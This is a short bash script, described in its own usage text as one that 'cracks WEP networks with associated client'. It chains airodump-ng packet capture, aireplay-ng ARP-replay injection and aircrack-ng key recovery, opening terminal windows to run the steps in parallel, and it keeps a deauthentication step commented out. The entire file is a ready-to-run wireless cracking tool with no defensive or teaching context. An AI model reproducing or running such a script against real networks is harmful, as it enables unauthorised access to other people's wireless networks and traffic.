#!/bin/bash if [ $# -eq 0 ]; then echo echo " Cracks WEP networks with associated client" echo " Usage: $0 " echo exit 1; fi case $1 in dump) airodump-ng -w scenario2 --channel $2 --bssid $3 $4 ; aircrack-ng -s -z scenario2-01.cap read exit ;; #deauth) # aireplay-ng -0 10 -a $2 -c $3 $4 # read # exit # ;; inject) aireplay-ng -3 -b $2 -h $3 -x 500 $4 read exit ;; *) aterm -tr +sb -sr -sk -bg black -fg white -fade 90 -bl -tn xterm -geometry 100x30+346+31 -e $0 dump $4 $1 $5 & sleep 10 #aterm -tr +sb -sr -sk -bg black -fg white -fade 90 -bl -tn xterm -geometry 100x10+15+363 -e $0 deauth $1 $2 $5 & aterm -tr +sb -sr -sk -bg black -fg white -fade 90 -bl -tn xterm -geometry 100x10+15+519 -e $0 inject $1 $2 $5 & ;; esac